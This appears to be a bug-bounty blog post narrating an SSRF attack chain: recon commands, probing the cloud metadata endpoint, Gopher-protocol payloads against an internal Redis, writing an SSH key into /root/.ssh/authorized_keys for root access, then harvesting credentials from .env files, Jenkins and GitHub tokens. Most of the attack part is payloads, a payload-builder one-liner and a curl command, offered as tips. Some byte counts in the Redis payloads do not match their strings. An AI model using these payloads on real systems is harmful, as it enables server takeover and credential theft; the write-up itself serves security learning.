Free Link 🎈

Hey there!😁

I was just having one of those lazy Sundays. You know, the kind where you open Burp Suite just to “poke around” for a few minutes, and 14 hours later you’re still sitting in the same chair with caffeine in your blood and Redis access in your logs. 😅

Little did I know… that day I’d stumble into an SSRF so juicy, it opened the gates to an exposed Redis instance, and let me toss payloads like I was Yeeting keys into a royal vault.

I started with the usual mass recon routine:

• assetfinder --subs-only target.com
• httpx -status -title -tech-detect -follow-redirects -timeout 10
• gau | gf ssrf
• Followed by a sprinkle of waybackurls, katana, and some Shodan dorking for flavor.

💡Tip: You can search Shodan with filters like http.title:"Welcome to nginx!" port:80 or product:"Redis" to uncover exposed services.

I noticed an odd subdomain:

preview-api.internal.target.com

It wasn’t public-facing from their homepage, but returned a 200 with a very suspicious header:

X-Preview-Service: true

This was my first sign. Internal preview tools? Sounds SSRF-ish already. Let’s go.

Digging deeper, I found a POST endpoint that accepted external URLs:

POST /generate-preview
Content-Type: application/json

{
  "url": "http://example.com"
}

So naturally, I replaced it with:

{
  "url": "http://169.254.169.254/latest/meta-data/"
}

✅ Got a timeout (suspicious)
✅ Tried a collaborator payload — got a DNS ping back

Boom. Blind SSRF confirmed. But I wanted more than pings. I wanted shells. 💥

After verifying SSRF, I tried pivoting to internal IPs:

• http://127.0.0.1:6379
• http://redis.internal:6379
• http://localhost:6379

One of them finally returned a different error code. Now I was certain Redis was open internally.

Now for the fun part — SSRF to Redis using the Gopher protocol.

Redis speaks its own protocol, and with Gopher, you can trick SSRF into talking to Redis. Here’s the actual payload format I used:

gopher://127.0.0.1:6379/_*3
$3
SET
$4
rcey
$13
gopher_owned

🧨 But we don’t stop at SET. We go full weaponized SSRF.

To get Remote Command Execution, I injected an SSH key into Redis:

gopher://127.0.0.1:6379/_*3
$3
SET
$9
ssh_key
$78
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7j04...[truncated]... user@pwned

Then I configured the key to drop into /root/.ssh/authorized_keys:

CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys

➡️ And boom 💥 — I was able to SSH into the box using the injected key.
(Hello there, root.)

Inside the internal system:

• .env files with:
• DATABASE_URL=postgres://user:pass@localhost:5432/app
• REDIS_PASSWORD=
• SECRET_KEY_BASE=...
• A local Jenkins build server with saved credentials:
• admin:admin123 🤦
• GitHub deploy keys
• Internal endpoints with no auth

Using the GitHub token, I accessed a private repo containing:

• API source code
• Internal Swagger files
• Hardcoded credentials

One SSRF… to total backend compromise.

# Gopher payload builder (manual)
python3 -c 'print("gopher://127.0.0.1:6379/_*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\npwned\r\n")'

If the service reflects or stores this into Redis → you own it.

You can also automate the injection with Burp Repeater or curl:

curl -X POST https://target.com/generate-preview \
  -H 'Content-Type: application/json' \
  -d '{"url":"gopher://127.0.0.1:6379/_*3..."}'

• Blind SSRF detection via DNS-based collaborator
• Protocol smuggling with Gopher → Redis
• Command chaining via Redis directives (CONFIG SET, SAVE)
• SSH key injection to pop shells
• Credential harvesting from .env, GitHub, and Jenkins
• Pivoting across internal services to maximize impact

Don’t ignore weird preview URLs or PDF/image renderers. They often route through headless browsers or server-side rendering, which are ripe for SSRF.

Always try Gopher if basic http:// payloads don’t work.

SSRFs are like onions — the more you peel, the more you cry… from joy or from impact. 🧅😂

So the next time someone says SSRF is “just internal metadata access,” show them how Redis might just hold the castle keys.

🔐➡️🏰

• LinkedIn
• Instagram: @rev_shinchan
• Gmail: [email protected]

#EnnamPolVazhlkai😇